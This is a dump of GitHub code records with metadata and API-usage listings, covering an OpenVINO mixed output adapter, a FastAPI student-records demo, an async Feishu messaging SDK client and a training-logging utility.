"smurf.db.models.Network.removed", "line_number": 145, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network.query.filter", "line_number": 150, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query", "line_number": 150, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 150, 
"usage_type": "name"}, {"api_name": "sqlalchemy.and_", "line_number": 151, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.user_id", "line_number": 151, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 151, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.name", "line_number": 151, "usage_type": "attribute"}, {"api_name": "smurf.db.models.VlanIpAddress.query.filter", "line_number": 154, "usage_type": "call"}, {"api_name": "smurf.db.models.VlanIpAddress.query", "line_number": 154, "usage_type": "attribute"}, {"api_name": "smurf.db.models.VlanIpAddress", "line_number": 154, "usage_type": "name"}, {"api_name": "smurf.db.models.VlanIpAddress.network_id", "line_number": 154, "usage_type": "attribute"}, {"api_name": "smurf.db.models.db_session.delete", "line_number": 161, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 161, "usage_type": "name"}, {"api_name": "smurf.db.models.db_session.flush", "line_number": 162, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 162, "usage_type": "name"}, {"api_name": "smurf.db.models.db_session.delete", "line_number": 163, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 163, "usage_type": "name"}, {"api_name": "smurf.db.models.db_session.commit", "line_number": 164, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 164, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.query.filter", "line_number": 188, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query", "line_number": 188, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 188, "usage_type": "name"}, {"api_name": "sqlalchemy.and_", "line_number": 188, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.name", "line_number": 188, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network.removed", "line_number": 189, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 189, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.user_id", "line_number": 190, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 190, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.query.filter", "line_number": 196, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query", "line_number": 196, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 196, "usage_type": "name"}, {"api_name": "sqlalchemy.and_", "line_number": 196, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.user_id", "line_number": 196, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network.name", "line_number": 197, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 197, "usage_type": "name"}, {"api_name": "smurf.db.models.db_session.commit", "line_number": 198, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 198, "usage_type": "name"}, {"api_name": "smurf.db.models.db_session.rollback", "line_number": 201, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 201, "usage_type": "name"}, {"api_name": "smurf.utils.get_token", "line_number": 215, "usage_type": "call"}, {"api_name": "smurf.config.controler_host", "line_number": 219, "usage_type": "attribute"}, {"api_name": "smurf.config", "line_number": 219, "usage_type": "name"}, {"api_name": "smurf.config.neutron_api_port", 
"line_number": 219, "usage_type": "attribute"}, {"api_name": "smurf.config.controler_host", "line_number": 223, "usage_type": "attribute"}, {"api_name": "smurf.config", "line_number": 223, "usage_type": "name"}, {"api_name": "smurf.config.neutron_api_port", "line_number": 223, "usage_type": "attribute"}, {"api_name": "smurf.config.overlay_ip.replace", "line_number": 230, "usage_type": "call"}, {"api_name": "smurf.config.overlay_ip", "line_number": 230, "usage_type": "attribute"}, {"api_name": "smurf.config", "line_number": 230, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 245, "usage_type": "call"}, {"api_name": "smurf.api_requests.api_requests.post_http", "line_number": 248, "usage_type": "call"}, {"api_name": "smurf.config.controler_host", "line_number": 262, "usage_type": "attribute"}, {"api_name": "smurf.config", "line_number": 262, "usage_type": "name"}, {"api_name": "smurf.config.neutron_api_port", "line_number": 263, "usage_type": "attribute"}, {"api_name": "smurf.config", "line_number": 263, "usage_type": "name"}, {"api_name": "smurf.api_requests.api_requests.delete_http", "line_number": 265, "usage_type": "call"}, {"api_name": "smurf.config.controler_host", "line_number": 284, "usage_type": "attribute"}, {"api_name": "smurf.config", "line_number": 284, "usage_type": "name"}, {"api_name": "smurf.config.neutron_api_port", "line_number": 285, "usage_type": "attribute"}, {"api_name": "smurf.config", "line_number": 285, "usage_type": "name"}, {"api_name": "smurf.api_requests.api_requests.get_http", "line_number": 287, "usage_type": "call"}, {"api_name": "smurf.utils.exec_cmd", "line_number": 324, "usage_type": "call"}, {"api_name": "smurf.utils.exec_cmd", "line_number": 337, "usage_type": "call"}, {"api_name": "smurf.api_requests.api_requests.get_http", "line_number": 348, "usage_type": "call"}, {"api_name": "smurf.config.network_ep", "line_number": 348, "usage_type": "attribute"}, {"api_name": "smurf.config", "line_number": 348, "usage_type": "name"}, {"api_name": "IPy.IP", "line_number": 378, "usage_type": "call"}, {"api_name": "IPy.IP", "line_number": 382, "usage_type": "call"}, {"api_name": "socket.ntohl", "line_number": 386, "usage_type": "call"}, {"api_name": "struct.unpack", "line_number": 386, "usage_type": "call"}, {"api_name": "socket.inet_aton", "line_number": 386, "usage_type": "call"}, {"api_name": "socket.inet_ntoa", "line_number": 390, "usage_type": "call"}, {"api_name": "struct.pack", "line_number": 390, "usage_type": "call"}, {"api_name": "socket.htonl", "line_number": 390, "usage_type": "call"}, {"api_name": "socket.inet_ntoa", "line_number": 398, "usage_type": "call"}, {"api_name": "struct.pack", "line_number": 398, "usage_type": "call"}, {"api_name": "socket.htonl", "line_number": 398, "usage_type": "call"}, {"api_name": "socket.inet_ntoa", "line_number": 403, "usage_type": "call"}, {"api_name": "struct.pack", "line_number": 403, "usage_type": "call"}, {"api_name": "socket.htonl", "line_number": 403, "usage_type": "call"}, {"api_name": "socket.inet_ntoa", "line_number": 408, "usage_type": "call"}, {"api_name": "struct.pack", "line_number": 408, "usage_type": "call"}, {"api_name": "socket.htonl", "line_number": 408, "usage_type": "call"}, {"api_name": "smurf.auth.X_resource", "line_number": 412, "usage_type": "attribute"}, {"api_name": "smurf.auth", "line_number": 412, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.query.filter", "line_number": 421, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query", "line_number": 
421, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 421, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.network_id", "line_number": 421, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 429, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session.rollback", "line_number": 434, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 434, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.query.filter", "line_number": 447, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query", "line_number": 447, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 447, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.network_id", "line_number": 447, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 454, "usage_type": "call"}, {"api_name": "smurf.api_requests.sdn_switch_config.PyjsonrpcClient", "line_number": 466, "usage_type": "call"}, {"api_name": "smurf.api_requests.sdn_switch_config.PyjsonrpcClient", "line_number": 480, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query.filter", "line_number": 486, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query", "line_number": 486, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 486, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.network_id", "line_number": 486, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network.iscreated", "line_number": 486, "usage_type": "attribute"}, {"api_name": "smurf.db.models.db_session.commit", "line_number": 487, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 487, "usage_type": "name"}, {"api_name": "smurf.db.models.db_session.rollback", "line_number": 489, "usage_type": "call"}, {"api_name": "smurf.db.models.db_session", "line_number": 489, "usage_type": "name"}, {"api_name": "smurf.auth.X_resource", "line_number": 495, "usage_type": "attribute"}, {"api_name": "smurf.auth", "line_number": 495, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.query.filter", "line_number": 505, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query", "line_number": 505, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 505, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.network_id", "line_number": 505, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network.query.filter", "line_number": 527, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query", "line_number": 527, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 527, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.network_id", "line_number": 527, "usage_type": "attribute"}, {"api_name": "smurf.api_requests.switch_config.SwitchConfig", "line_number": 540, "usage_type": "call"}, {"api_name": "smurf.api_requests.switch_config.SwitchConfig", "line_number": 545, "usage_type": "call"}, {"api_name": "smurf.api_requests.switch_config.SwitchConfig", "line_number": 550, "usage_type": "call"}]} +{"seq_id": "72429408442", "text": "from .adapter import Adapter, create_adapter\nfrom ..config import DictField\nfrom ..representation import ContainerPrediction\n\n\nclass MixedAdapter(Adapter):\n __provider__ = 'mixed'\n\n # this will be set after reading adapter configs\n prediction_types = ()\n\n @classmethod\n def parameters(cls):\n parameters = 
super().parameters()\n parameters.update({\n 'adapters': DictField(\n allow_empty=False,\n description='Dict where key is output name and value is adapter config map including'\n 'key \"output_blob\" to indicating output layer of model')\n })\n return parameters\n\n def __create_adapter(self, adapter_config, output_blob):\n adapter = create_adapter(adapter_config)\n adapter.launcher_config = self.launcher_config\n adapter.output_blob = output_blob\n return adapter\n\n def configure(self):\n adapters = self.get_value_from_config('adapters')\n self.adapters = {}\n for output_name, adapter_config in adapters.items():\n layer_name = adapter_config.pop('output_blob')\n self.adapters[layer_name] = (output_name, self.__create_adapter(adapter_config, layer_name))\n prediction_types = set()\n for _, adapter in self.adapters.values():\n prediction_types.update(adapter.prediction_types)\n self.prediction_types = tuple(prediction_types)\n\n @staticmethod\n def is_result_valid(result: dict):\n '''\n this method check whether values of result dict have the same length\n '''\n list_len = -1\n for val in result.values():\n if list_len < 0:\n list_len = len(val)\n else:\n if list_len != len(val):\n return False\n return True\n\n def process(self, raw, identifiers, frame_meta):\n result = {}\n\n for layer, (_, adapter) in self.adapters.items():\n result[layer] = adapter.process(raw, identifiers, frame_meta)\n\n if not self.is_result_valid(result):\n raise RuntimeError(\"length of predictions from each adapter should be same\")\n\n output = []\n\n for i, _ in enumerate(identifiers):\n container_args = {}\n for layer, (name, _) in self.adapters.items():\n if isinstance(result[layer][i], ContainerPrediction):\n container_args.update(result[layer][i].representations)\n else:\n container_args[name] = result[layer][i]\n output.append(ContainerPrediction(container_args))\n\n return output\n", "repo_name": "openvinotoolkit/open_model_zoo", "sub_path": "tools/accuracy_checker/openvino/tools/accuracy_checker/adapters/mixed_adapter.py", "file_name": "mixed_adapter.py", "file_ext": "py", "file_size_in_byte": 2645, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3804, "dataset": "github-code", "pt": "41", "api": [{"api_name": "adapter.Adapter", "line_number": 6, "usage_type": "name"}, {"api_name": "config.DictField", "line_number": 16, "usage_type": "call"}, {"api_name": "adapter.create_adapter", "line_number": 24, "usage_type": "call"}, {"api_name": "adapter.launcher_config", "line_number": 25, "usage_type": "attribute"}, {"api_name": "adapter.output_blob", "line_number": 26, "usage_type": "attribute"}, {"api_name": "adapter.prediction_types", "line_number": 37, "usage_type": "attribute"}, {"api_name": "adapter.process", "line_number": 58, "usage_type": "call"}, {"api_name": "representation.ContainerPrediction", "line_number": 68, "usage_type": "argument"}, {"api_name": "representation.ContainerPrediction", "line_number": 72, "usage_type": "call"}]} +{"seq_id": "33948737077", "text": "import imp\nfrom shutil import move\nfrom fastapi import FastAPI\n\napp = FastAPI()\n\nstudents = [\n{\n\"name\": \"\",\n\"class\": \"\",\n\"year\": 0\n},\n{\n\"name\": \"Ramu\",\n\"class\": \"9th\",\n\"year\": 1964\n},\n{\n\"name\": \"Maru\",\n\"class\": \"11th\",\n\"year\": 200\n},\n{\n\"name\": \"Jani\",\n\"class\": \"12th\",\n\"year\": 2005\n},\n{\n\"name\": \"Viju\",\n\"class\": \"10th\",\n\"year\": 2013\n}\n\n]\n\n# Home Page Message\n@app.get(\"/\")\nasync def root():\n return {'message':'welcome to API '}\n\n# 
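The MixedAdapter above is essentially a dispatch-and-merge: each output layer is routed to its own adapter, the per-layer result lists are validated to have equal length, and the i-th entries are merged per identifier. A minimal sketch of that same pattern with plain callables (the names here are hypothetical stand-ins, not the real accuracy_checker API):

# Dispatch raw outputs to per-layer handlers, validate, and merge per identifier.
def process_mixed(adapters, raw, identifiers):
    # adapters: {layer_name: (output_name, callable)}, mirroring self.adapters above
    result = {layer: fn(raw, identifiers) for layer, (_, fn) in adapters.items()}
    if len({len(v) for v in result.values()}) > 1:  # same check as is_result_valid
        raise RuntimeError("length of predictions from each adapter should be the same")
    return [{name: result[layer][i] for layer, (name, _) in adapters.items()}
            for i, _ in enumerate(identifiers)]

adapters = {
    "cls_out": ("classification", lambda raw, ids: [raw["cls_out"][i] for i in range(len(ids))]),
    "box_out": ("detection", lambda raw, ids: [raw["box_out"][i] for i in range(len(ids))]),
}
raw = {"cls_out": ["cat", "dog"], "box_out": [[0, 0, 1, 1], [2, 2, 3, 3]]}
print(process_mixed(adapters, raw, identifiers=["img0", "img1"]))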
All Students\n@app.get(\"/students\")\ndef get_students():\n    return students\n\n# Single Student\n@app.get(\"/student/{student_id}\")\ndef get_Student(student_id:int):\n    return students[student_id-1]\n\n# Delete\n@app.delete(\"/student/{student_id}\")\ndef delete_Student(student_id:int):\n    students.pop(student_id-1)  # ids are 1-indexed, matching get_Student\n    return {\"message\":\"Student has been deleted successfully\"}\n\n# Adding - POST\n@app.post(\"/create_Student\")\ndef create_Student(student:dict):\n    students.append(student)\n    return students[-1]\n\n# Update Student\n@app.post(\"/update_Student\")\ndef update_Student(student_id:int, student:dict):\n    student_updated = students[student_id-1]  # ids are 1-indexed, matching get_Student\n    student_updated['name'] = student['name'] \n    student_updated['class'] = student['class'] \n    student_updated['year'] = student['year']\n    students[student_id-1] = student_updated\n    return student_updated\n\n# web: gunicorn main:app -k whispering-anchorage-28200.herokuapp.com/\n\n# pip install fastapi\n# pip install \"uvicorn[standard]\"\n# uvicorn main:app --reload", "repo_name": "akashbadole/api-fastapi", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1442, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "fastapi.FastAPI", "line_number": 5, "usage_type": "call"}]} +{"seq_id": "2661231494", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport json\n\nfrom typing import List\n\nfrom feishu_sdk.base_client import BaseClient\nfrom feishu_sdk.card.card import CardMessage\nfrom feishu_sdk.card.modules import DivModule\nfrom feishu_sdk.card.objects import LarkMdObj\nfrom feishu_sdk.feishu_response import FeishuResponse\n\n\nclass FeishuClient(BaseClient):\n    \"\"\"\n    TODO: parameter validation\n    \"\"\"\n    async def user_batch_get(self, open_ids: List = None, employ_ids: List = None) -> FeishuResponse:\n        params = {\"open_ids\": open_ids} if open_ids else {'employ_ids': employ_ids}\n        auth_headers = await self.auth_headers()\n        return await self.api_call(\"/contact/v1/user/batch_get\", params=params, headers=auth_headers)\n\n    async def user_batch_get_id(self, emails: List = [], mobiles: List = []) -> FeishuResponse:\n        params = {'emails': emails, \"mobiles\": mobiles}\n        auth_headers = await self.auth_headers()\n        return await self.api_call(\"/user/v1/batch_get_id\", params=params, headers=auth_headers)\n\n    async def user_search(self, query: str, page_size: int = 20, page_token: str = None) -> FeishuResponse:\n        params = {\"query\": query, \"page_size\": page_size}\n        if page_token:\n            params['page_token'] = page_token\n        auth_headers = await self.auth_headers()\n        return await self.api_call(\"/search/v1/user\", params=params, headers=auth_headers)\n\n    async def chat_create(self,\n                          name: str,\n                          description: str = None,\n                          owner_open_id: str = None,\n                          owner_user_id: str = None,\n                          open_ids: List = None,\n                          user_ids: List = None,\n                          i18n_names: dict = None,\n                          only_owner_add: bool = False,\n                          share_allowed: bool = True,\n                          add_member_verify: bool = False,\n                          only_owner_at_all: bool = False,\n                          only_owner_edit: bool = False,\n                          send_message_permission: str = \"all\",\n                          join_message_visibility: str = \"all\",\n                          leave_message_visibility: str = \"owner\",\n                          group_email_enabled: bool = False,\n                          send_group_email_permission: str = \"tenant_member\") -> FeishuResponse:\n        json = {\"name\": name}\n        if owner_open_id:\n            json[\"owner_open_id\"] = owner_open_id\n        if owner_user_id:\n            json[\"owner_user_id\"] = owner_user_id\n        if open_ids:\n            json[\"open_ids\"] = open_ids\n        if 
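To exercise the student endpoints above, one hypothetical client session, assuming the app was started with "uvicorn main:app --reload" (as the file's closing comments suggest) and is listening on uvicorn's default http://127.0.0.1:8000:

# Hypothetical local exercise of the endpoints above; paths come from the code,
# host and port are the uvicorn defaults.
import requests

base = "http://127.0.0.1:8000"
print(requests.get(f"{base}/students").json())                   # list all students
print(requests.get(f"{base}/student/2").json())                  # 1-indexed lookup
new = {"name": "Asha", "class": "8th", "year": 2010}
print(requests.post(f"{base}/create_Student", json=new).json())  # body is the student dict
# update_Student takes student_id as a query parameter and the student as the body
print(requests.post(f"{base}/update_Student", params={"student_id": 1}, json=new).json())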
user_ids:\n json[\"user_ids\"] = user_ids\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/chat/v4/create/\", json=json, headers=auth_headers)\n\n async def chat_info(self, chat_id: str) -> FeishuResponse:\n params = {\"chat_id\": chat_id}\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/chat/v4/info\", params=params, headers=auth_headers)\n\n async def chat_update(self,\n chat_id: str,\n name: str = None,\n description: str = None,\n owner_open_id: str = None,\n owner_user_id: str = None,\n i18n_names: dict = None,\n only_owner_add: bool = False,\n share_allowed: bool = True,\n add_member_verify: bool = False,\n only_owner_at_all: bool = False,\n only_owner_edit: bool = False,\n send_message_permission: str = \"all\",\n join_message_visibility: str = \"all\",\n leave_message_visibility: str = \"owner\",\n group_email_enabled: bool = False,\n send_group_email_permission: str = \"tenant_member\"):\n json = {\"chat_id\": chat_id}\n if name:\n json[\"name\"] = name\n if description:\n json[\"description\"] = description\n if owner_open_id:\n json[\"owner_open_id\"] = owner_open_id\n if owner_user_id:\n json[\"owner_user_id\"] = owner_user_id\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/chat/v4/update/\", json=json, headers=auth_headers)\n\n async def chat_chatter_add(self, chat_id: str, open_ids: List = None, user_ids: List = None):\n json = {\"chat_id\": chat_id}\n if open_ids:\n json[\"open_ids\"] = open_ids\n if user_ids:\n json[\"user_ids\"] = user_ids\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/chat/v4/chatter/add/\", json=json, headers=auth_headers)\n\n async def chat_chatter_delete(self, chat_id: str, open_ids: List = None, user_ids: List = None):\n json = {\"chat_id\": chat_id}\n if open_ids:\n json[\"open_ids\"] = open_ids\n if user_ids:\n json[\"user_ids\"] = user_ids\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/chat/v4/chatter/delete/\", json=json, headers=auth_headers)\n\n async def chat_disband(self, chat_id: str):\n json = {\"chat_id\": chat_id}\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/chat/v4/disband\", json=json, headers=auth_headers)\n\n async def chat_list(self, page_size: int = 100, page_token: str = None):\n params = {\"page_size\": page_size}\n if page_token:\n params[\"page_token\"] = page_token\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/chat/v4/list\", params=params, headers=auth_headers)\n\n async def bot_info(self):\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/bot/v3/info/\", params={}, headers=auth_headers)\n\n async def bot_add(self, chat_id: str):\n json = {\"chat_id\": chat_id}\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/bot/v3/add/\", json=json, headers=auth_headers)\n\n async def bot_remove(self, chat_id: str):\n json = {\"chat_id\": chat_id}\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/bot/v3/remove/\", json=json, headers=auth_headers)\n\n async def message_batch_send(self,\n msg_type: str,\n content: object,\n department_ids: List = None,\n open_ids: List = None,\n user_ids: List = None):\n json = {\"msg_type\": msg_type, \"content\": content}\n if department_ids:\n json[\"department_ids\"] = department_ids\n if open_ids:\n json[\"open_ids\"] = open_ids\n if user_ids:\n json[\"user_ids\"] = user_ids\n auth_headers = await self.auth_headers()\n return await 
self.api_call(\"/message/v4/batch_send/\", json=json, headers=auth_headers)\n\n async def message_text_send(self,\n text: str,\n open_id: str = None,\n user_id: str = None,\n email: str = None,\n chat_id: str = None,\n root_id: str = None):\n return await self.__message_send(\"text\", {\"text\": text}, open_id, user_id, email, chat_id, root_id)\n\n async def message_image_send(self,\n image_key: str,\n open_id: str = None,\n user_id: str = None,\n email: str = None,\n chat_id: str = None,\n root_id: str = None):\n return await self.__message_send(\"image\", {\"image_key\": image_key}, open_id, user_id, email, chat_id, root_id)\n\n async def message_post_send(self,\n content: List,\n title: str = None,\n zh_cn: object = None,\n ja_jp: object = None,\n en_us: object = None,\n open_id: str = None,\n user_id: str = None,\n email: str = None,\n chat_id: str = None,\n root_id: str = None):\n post = {\"content\": content}\n if title:\n post[\"title\"] = title\n if zh_cn:\n post[\"zh_cn\"] = zh_cn\n if ja_jp:\n post[\"ja_jp\"] = ja_jp\n if en_us:\n post[\"en_us\"] = en_us\n return await self.__message_send(\"post\", post, open_id, user_id, email, chat_id, root_id)\n\n async def message_share_chat_send(self,\n share_open_chat_id: str,\n open_id: str = None,\n user_id: str = None,\n email: str = None,\n chat_id: str = None,\n root_id: str = None):\n return await self.__message_send(\"share_chat\", {\"share_open_chat_id\": share_open_chat_id}, open_id, user_id, email,\n chat_id, root_id)\n\n async def message_md_send(self, md: str, open_id: str = None, chat_id: str = None, root_id: str = None):\n div_module = DivModule(text=LarkMdObj(content=md))\n card = CardMessage(elements=[div_module])\n return await self.message_interactive_send(card=card, open_id=open_id, chat_id=chat_id, root_id=root_id)\n\n async def message_interactive_send(self,\n card: CardMessage,\n update_multi: bool = False,\n open_id: str = None,\n user_id: str = None,\n email: str = None,\n chat_id: str = None,\n root_id: str = None):\n card_json = json.dumps(card, default=lambda o: o.__dict__)\n card_dict = json.loads(card_json)\n kwards = {\"card\": card_dict, \"update_multi\": update_multi}\n return await self.__message_send(\"interactive\",\n open_id=open_id,\n user_id=user_id,\n email=email,\n chat_id=chat_id,\n root_id=root_id,\n kwards=kwards)\n\n async def __message_send(self,\n msg_type: str,\n content: object = None,\n open_id: str = None,\n user_id: str = None,\n email: str = None,\n chat_id: str = None,\n root_id: str = None,\n kwards: dict = {}):\n json = {\"msg_type\": msg_type}\n if content:\n json[\"content\"] = content\n if open_id:\n json[\"open_id\"] = open_id\n if user_id:\n json[\"user_id\"] = user_id\n if email:\n json[\"email\"] = email\n if chat_id:\n json[\"chat_id\"] = chat_id\n if root_id:\n json[\"root_id\"] = root_id\n if kwards:\n json.update(kwards)\n\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/message/v4/send/\", json=json, headers=auth_headers)\n\n async def message_recall(self, message_id: str):\n json = {\"message_id\": message_id}\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/message/v4/recall/\", json=json, headers=auth_headers)\n\n async def message_read_info(self, message_id: str):\n json = {\"message_id\": message_id}\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/message/v4/read_info/\", json=json, headers=auth_headers)\n", "repo_name": "ilpan/feishu-sdk", "sub_path": "feishu_sdk/feishu_client.py", 
"file_name": "feishu_client.py", "file_ext": "py", "file_size_in_byte": 12432, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "41", "api": [{"api_name": "feishu_sdk.base_client.BaseClient", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 19, "usage_type": "name"}, {"api_name": "feishu_sdk.feishu_response.FeishuResponse", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 24, "usage_type": "name"}, {"api_name": "feishu_sdk.feishu_response.FeishuResponse", "line_number": 24, "usage_type": "name"}, {"api_name": "feishu_sdk.feishu_response.FeishuResponse", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 42, "usage_type": "name"}, {"api_name": "feishu_sdk.feishu_response.FeishuResponse", "line_number": 53, "usage_type": "name"}, {"api_name": "feishu_sdk.feishu_response.FeishuResponse", "line_number": 66, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 100, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 109, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 147, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 148, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 149, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 179, "usage_type": "name"}, {"api_name": "feishu_sdk.card.modules.DivModule", "line_number": 211, "usage_type": "call"}, {"api_name": "feishu_sdk.card.objects.LarkMdObj", "line_number": 211, "usage_type": "call"}, {"api_name": "feishu_sdk.card.card.CardMessage", "line_number": 212, "usage_type": "call"}, {"api_name": "feishu_sdk.card.card.CardMessage", "line_number": 216, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 223, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 224, "usage_type": "call"}, {"api_name": "json.update", "line_number": 257, "usage_type": "call"}]} +{"seq_id": "29098895633", "text": "__all__ = ['log_info', 'log_datasets']\n\nimport logging\nimport os\nfrom typing import Optional, Collection\n\nimport torch\nfrom flexlearn.context import Context\nfrom flexlearn.distributed import ProcessGroup\nfrom flexutils.io.file_system import simplify_path\nfrom flexutils.misc.string import format_table\n\n\ndef log_info(args,\n session_path,\n gpus: Collection[torch.device],\n process_group: Optional[ProcessGroup] = None,\n logger: Optional[logging.Logger] = None,\n task: str = \"training\"):\n logger = logger or Context.get_default_argument(\"logger\", required=True)\n process_group = process_group or Context.get_default_argument(\"process_group\")\n gpus = list(gpus)\n\n if process_group is None:\n if gpus:\n device_mapping = os.environ.get(\"CUDA_VISIBLE_DEVICES\")\n if device_mapping is not None:\n device_mapping = list(map(int, device_mapping.split(\",\")))\n else:\n device_mapping = list(range(torch.cuda.device_count()))\n if len(gpus) == 1:\n message = f\"The standalone {task} will be executed on gpu \" \\\n f\"{device_mapping[gpus[0].index]}\"\n else:\n message = f\"The standalone {task} will be executed on gpus \" \\\n f\"{[device_mapping[gpu.index] for gpu in gpus]}\"\n else:\n message = f\"The standalone {task} will executed on cpu\"\n logger.info(message)\n else:\n row_rank = [\n \"Rank\",\n str(process_group.global_rank()),\n str(process_group.local_rank()),\n str(process_group.node_rank())\n ]\n 
row_size = [\n \"Size\",\n str(process_group.global_size()),\n str(process_group.local_size()),\n str(process_group.node_size())\n ]\n table = format_table(headers=[\"\", \"Global\", \"Local\", \"Node\"],\n rows=[row_rank, row_size])\n logger.info(\n f\"The training will be conducted in distributed mode:\\n{table}\\n\")\n\n message = \"The paths for current training script:\\n\"\n if args.resume_path:\n message += f\"Resume path: {simplify_path(args.resume_path)}\\n\"\n else:\n message += f\"Config path: {simplify_path(args.config_path)}\\n\"\n message += f\"Dataset path: {simplify_path(args.dataset_path)}\\n\"\n message += f\"Session path: {simplify_path(session_path)}\\n\"\n logger.info(message)\n\n\ndef log_datasets(config: dict, logger: Optional[logging.Logger] = None):\n logger = logger or Context.get_default_argument(\"logger\", required=True)\n headers = [\"\", \"# Items\", \"# Batches\", \"Batch Size\"]\n rows = []\n for key, config in config.items():\n rows.append([\n key,\n str(len(config.dataset)),\n str(len(config.data_loader)),\n str(config.data_loader.batch_size)\n ])\n logger.info(\"Datasets:\\n\" + format_table(headers, rows) + \"\\n\")\n", "repo_name": "Kipsora/CSC2541", "sub_path": "utils/logging.py", "file_name": "logging.py", "file_ext": "py", "file_size_in_byte": 2787, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "typing.Collection", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 16, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 17, "usage_type": "name"}, {"api_name": "flexlearn.distributed.ProcessGroup", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 18, "usage_type": "name"}, {"api_name": "logging.Logger", "line_number": 18, "usage_type": "attribute"}, {"api_name": "flexlearn.context.Context.get_default_argument", "line_number": 20, "usage_type": "call"}, {"api_name": "flexlearn.context.Context", "line_number": 20, "usage_type": "name"}, {"api_name": "flexlearn.context.Context.get_default_argument", "line_number": 21, "usage_type": "call"}, {"api_name": "flexlearn.context.Context", "line_number": 21, "usage_type": "name"}, {"api_name": "os.environ.get", "line_number": 26, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 26, "usage_type": "attribute"}, {"api_name": "torch.cuda.device_count", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 30, "usage_type": "attribute"}, {"api_name": "flexutils.misc.string.format_table", "line_number": 53, "usage_type": "call"}, {"api_name": 